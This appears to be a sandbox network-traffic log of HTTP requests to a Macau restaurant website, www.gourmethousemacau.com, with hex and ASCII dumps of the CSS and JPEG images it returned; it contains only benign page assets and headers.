                                                                                                                                                              Data Raw: 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 31 39 39 70 78 29 7b 0d 0a 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 e8 bd ae e6 92 ad e5 9b be 20 62 61 6e 6e 65 72 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 20 20 2e 73 77 69 70 65 72 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 39 30 25 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0d 0a 20 20 7d 0d 0a 0d 0a 20 20 2e 73 77 69 70 65 72 2d 69 63 6f 6e 7b 0d 0a 20 20 20 20 74 6f 70 3a 35 30 25 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 34 32 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 34 32 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 38 70 78 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 32 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 69 70 65 72 2d 6c 65 66 74 7b 0d 0a 20 20 20 20 6c 65 66 74 3a 32 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 32 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 69 70 65 72 2d 72 69 67 68 74 7b 0d 0a 20 20 20 20 72 69 67 68 74 3a 32 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 32 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 61 70 65 72 2d 69 6d 67 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 61 70 65 72 2d 69 6e 64 65 78 7b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 37 30 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 75 70 65 72 2d 69 6d 67 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 33 30 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 0d 0a 0d 0a 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6e 65 77 20 70 72 6f 64 75 63 74 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 68 33 20 7b 0d 0a 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0d 0a 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0d 0a 20 7d 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 70 20 7b 0d 0a 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0d 0a 20 7d 0d 0a 20 2f 2a e5 b7 a6 e4 be a7 2a 2f 0d 0a 20 2e 70 72 6f 64 75 63 74 2d 6c 65 66 74 20 2e 70 72 6f 64 75 63 74 2d 6c 65 66 74 2d 63 6f 6e 20 7b 0d 0a 20 09 77 69 64 74 68 3a 20 39 30 25 3b 0d 0a 20 7d 0d 0a 20 2f 2a e5 8f b3 e4 be a7 2a 2f 0d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 2d 63 6f 6e 20 7b 0d 0a 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 2e 34 32 72 65 6d 3b 0d 0a 20 7d 0d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 2d 63 6f 6e 20 2e 72 69 67 68 74 2d 63 6f 6e 2d 69 6d 67 20 7b 0d 0a 20 09 77 69 64 74 68 3a 20 33 37 25 3b 0d 0a 20 7d 0d 0a 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 2d 63 6f 6e 20 2e 72 69 67 68 74 2d 63 6f 6e 2d 74 78 74 20 7b 0d 0a 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 2e 32 31 72 65 6d 3b 0d 0a 20 7d 0d 0a 20 0d 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 e5 95 86 e7 94 a8 e8 a7 a3 e5 86 b3 e6 96 b9 e6 a1 88 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 2e 73 6f 6c 75
                                                                                                                                                              Data Ascii: @media screen and (min-width: 1199px){ /*---------------- banner ---------------*/ .swiper{ height:90%; margin-top:0; } .swiper-icon{ top:50%; width:42px; height:42px; font-size:28px; line-height:42px; } .swiper-left{ left:20px; text-indent:-2px; } .swiper-right{ right:20px; text-indent:2px; } .swaper-img{ font-size:24px; } .swaper-index{ bottom:70px; } .uper-img{ height:30px; } /*----------------new product---------------*/ .new-products h3 { font-size: 24px; line-height: 24px; } .new-products p { font-size: 16px; line-height: 24px; } /**/ .product-left .product-left-con { width: 90%; } /**/ .product-right .product-right-con { padding-left: 0.42rem; } .product-right-con .right-con-img { width: 37%; } .product-right-con .right-con-txt { padding-left: 0.21rem; } /*--------------- --------------*/.solu
                                                                                                                                                              Mar 13, 2023 05:26:08.474106073 CET1040OUTGET /images/menu_leftPic.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.679224968 CET1109INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 506
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e2d57bf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3b 03 01 11 00 02 11 01 03 11 01 ff c4 00 79 00 01 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 04 05 08 07 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 04 01 05 07 08 10 00 02 01 01 06 03 09 00 00 00 00 00 00 00 00 00 00 12 01 22 11 02 03 13 04 05 21 31 14 41 51 32 42 15 06 16 17 08 11 01 00 01 02 04 06 03 00 00 00 00 00 00 00 00 00 00 11 01 02 41 51 12 04 31 81 91 22 42 03 14 15 06 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef ae 79 65 a0 1c 03 80 70 0e 01 c0 38 07 02 33 12 86 46 10 0c 20 18 40 30 80 61 00 c2 01 84 09 fb f6 d5 aa f6 fe f5 ba ec 9a dc 39 c2 d5 6d 7a ac 5d 36 2d db d1 67 1c 3b d3 11 31 df 13 1c 62 7b 60 b7 bc da df b5 f7 5f ea be 91 5b 6b 5a 74 4a eb 74 d6 b4 54 31 59 11 80 30 06 00 c0 18 03 01 b4 bf 48 7d 60 f1 d7 e7 fc fb 2a e6 57 a6 ab 65 59 47 5a d4 2d 9e 1f 3f 2b 29 3a b7 ee 7e b2 7b e7 e4 47 8e 58 6b c2 32 f2 e4 d8 6e b4 63 c5 8a 6a 39 52 81 50 0a 80 54 02 a0 15 00 a8 0f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed;y"!1AQ2BAQ1"B?yep83F @0a9mz]6-g;1b{`_[kZtJtT1Y0H}`*WeYGZ-?+):~{GXk2ncj9RPT
                                                                                                                                                              Mar 13, 2023 05:26:08.683921099 CET1109OUTGET /images/menu_rightPic.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.888380051 CET1186INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 529
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a4c187f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 2d 03 01 11 00 02 11 01 03 11 01 ff c4 00 81 00 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 05 04 07 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 07 08 10 00 01 02 03 06 04 07 00 00 00 00 00 00 00 00 00 00 01 12 11 03 04 21 02 22 14 05 15 71 62 13 17 41 51 a1 93 44 16 27 11 01 00 01 02 02 05 0d 00 00 00 00 00 00 00 00 00 00 11 02 12 01 13 21 81 a1 03 04 f0 31 41 22 42 62 82 b2 c2 23 14 15 25 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef af 3e 59 70 07 80 78 07 80 78 07 81 99 c5 a1 23 84 03 84 03 84 03 84 03 84 0c ee 2c 0e 00 e0 0e 00 e0 2b cb d2 6a e6 68 55 7a fb 15 28 69 2b e9 b4 f5 9a a9 65 e9 b5 12 a7 cd 4b a8 be 2a 97 64 db c5 3c cd 34 f0 b5 e3 b8 ab 7d 1d 5c 2a c2 9d 75 61 56 3e 95 ad d1 28 98 8c e8 31 00 c4 03 10 15 34 5d 9b 73 a4 fb 0e 73 67 7a 67 76 fe 9e 61 91 b5 9d 5c 31 e2 68 e1 72 33 30 cf ba ce 9b 62 ed 53 a1 34 c4 e9 e6 7a 13 f8 9f 69 fe 1f 6f a3 cf d7 cd c3 de cc 7a c3 90 f6 9f c5 fa ae cf c6 d7 37 79 af db e1 74 fd ac be ef 2d af ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed-!"qbAQD'!1A"Bb#%?>Ypxx#,+jhUz(i+eK*d<4}\*uaV>(14]ssgzgva\1hr30bS4zioz7yt-
                                                                                                                                                              Mar 13, 2023 05:26:09.035625935 CET1213OUTGET /images/indexpic06.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.253449917 CET1240INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 170351
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "ec8ed2f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 31 39 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 31 38 20 31 33 3a 30 30 3a 30 39 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 3e a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00 00 01 26 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 2e 02 02 00 04 00 00 00 01 00 00 30 03 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii: 19ExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2020:06:18 13:00:09>^&(.0HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://www.iec.chIEC http://www.iec.ch
                                                                                                                                                              Mar 13, 2023 05:26:15.652555943 CET2338OUTGET /images/menu02b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:15.858287096 CET2354INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1520
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a28a2ff8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:21 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3e 03 01 11 00 02 11 01 03 11 01 ff c4 00 8c 00 01 00 03 00 03 01 00 00 00 00 00 00 00 00 00 00 00 03 04 06 01 05 07 08 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 08 10 00 01 04 01 03 04 02 01 03 05 00 00 00 00 00 00 01 02 03 04 05 11 00 12 06 21 31 22 07 13 14 32 41 61 71 52 23 53 16 17 11 00 02 01 02 04 04 04 03 09 01 00 00 00 00 00 00 01 02 11 00 03 21 31 12 04 41 51 13 05 71 81 22 32 f0 61 a1 91 b1 c1 d1 f1 72 92 24 06 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 dd fa f9 66 b8 15 67 eb 4c 30 cd 80 8a f1 80 97 84 75 4e f8 d5 f0 87 8a 4a c3 65 cc 6d dc 52 09 c6 73 8e ba bf 45 f4 6b d2 74 cc 4c 61 39 c4 e5 31 c2 a6 30 9a ad bf 54 a8 a6 fd 29 4d fa 52 9b f4 a5 37 e9 4a 6f d2 95 f4 47 ac 21 22 a3 8e 57 bb 35 55 c8 89 ec 3b 07 a0 5d 7d d9 d0 e2 38 9a 66 da 72 29 5b 28 94 f3 6b 5e 5f 78 af fb 61 47 2d 01 df 03 5e ff 00 fc f5 81 63 6c a5 f4 c6 e1 8a b6 a6 45 3d 20 0a 48 0e 41 3e b6 27 d3 3e c1 5b 96 44 2e 3c 7c 32 ae 81 35 d5 5c 7b d7 fc 92 a7 96 c6 b0 92 aa 8e 6c 88 9f 5a bd d6 a3 2d 6f 35 15 d4 15 17 5e 69 e0 13 b4 29 43 08 39 e8 3a 03 b8 69 0d bd ad af 6f bb 6b 72 18 e8 dc 44 29 0b 88 52 33 21 b0 89 39 19 c3 c6 ab a4 2a 10 dc ea a5 f7 01 e3 bc 4f fd a6 c6 d9 fb 1b 6a ba bb 28 35 d4 b0 a2 38 d4 59 0e 19 f1 3e f2 55 21 f5 b2 fa 11 f1 b5 84 90 96 ce e5 7f 48 d6 2d e7 64 db 6c 7a d7 2e 17 64 57 55 50 a4 2b 1d 6b d4 96 62 18 08 5c 30 5c 5b 95 43 5a 09 24 e5 f0 6a 3e 45 eb da 6a 9a 6e 55 73 0e 6c c7 99 81 1b 8f 4f a1 6d e2 da 56 18 ba 43 ab 5a 25 24 23 aa d1 f1 80 36 94 8f d4 8e b8 15 df 76 2b 36 2c de ba ac c4 28 b4 c9 31 ed ba 09 21 f0 cc 47 08 a8 7b 40 02 7c 3e b5 a4 87 c5 b8 7d 00 e6 31 66 d5 cc b9 0d f0 a8 17 28 79 c9 11 d0 b6 97 29 51 54 e8 60 aa 23 bf 1a f7 39 84 af ae 13 94 90 73 b8 6f da ed bb 3d af 5d 5d 19 ff 00 ae 8f 9a c8 d5 a2 74 fa 0c 19 38 37 01 22 0c cd 5c 22 ac ce 38 4f c6 15 87 f5 59 4b 9c ae c5 2c 21 41 2e 51 5e 06 1a 52 82 97 83 01 fd a9 24 04 e4 fe e0 0f e3 5c 8f f3 80 1d db 69 e3 6e ec 7f 06 ac 76 7d de 47 ee a9 78 a0 69 5e b6 f6 32 64 ba 63 c6 7a cf 8e b6 e4 9d a5 5b 47 cb 2c ac 80 3b 94 a7 ae 35 6e da a0 f6 dd d0 63 00 bd 9c 7c de 7e ca 27 b1 bc aa fc fe 19 c6 63 5f d0 b4 13 25 8e 1d 65 22 4b 4b e6 0a b9 86 f4 67 da 69 1b 83 88 53 70 d2 18 71 00 6e 2c 39 b9 6a e8 81 82 42 b5 9a f7 68 da a6 e2 d8 c4 58 62 47 53 a8 85 48 03 31 09 e8 61 99 b6 d2 c7 da 20 e3 52 6d ac 8e 5c e4 7e 5f 4a f2 9b 2b cb 3b 74 56 35 63 2b e7 6e 9e 1a 20 56 b6 10 84 25 a8 ed 95 29 28 01 09 48 27 2a 24 a8 e4 93 dc 9d 70 37 1b ab b7 c2 07 32 11
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed>!1"2AaqR#S!1AQq"2ar$?fgL0uNJemRsEktLa910T)MR7JoG!"W5U;]}8fr)[(k^_xaG-^clE= HA>'>[D.<|25\{lZ-o5^i)C9:iokrD)R3!9*Oj(58Y>U!H-dlz.dWUP+kb\0\[CZ$j>EjnUslOmVCZ%$#6v+6,(1!G{@|>}1f(y)QT`#9so=]]t87"\"8OYK,!A.Q^R$\inv}Gxi^2dcz[G,;5nc|~'c_%e"KKgiSpqn,9jBhXbGSH1a Rm\~_J+;tV5c+n V%)(H'*$p72
                                                                                                                                                              Mar 13, 2023 05:26:21.635653973 CET2504OUTGET /images/menu06b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:21.855479002 CET2544INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1595
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "20ea6ff8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 48 03 01 11 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 07 06 03 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 01 06 05 08 10 00 01 04 02 02 00 06 01 03 05 01 00 00 00 00 00 03 01 02 04 05 11 06 00 12 21 41 22 13 14 07 31 71 42 15 51 61 a1 32 52 08 11 00 02 01 03 02 04 04 05 05 01 00 00 00 00 00 00 01 02 11 00 12 03 21 04 31 41 51 05 61 22 42 13 f0 81 b1 32 52 71 a1 72 14 06 43 ff da 00 0c 03 01 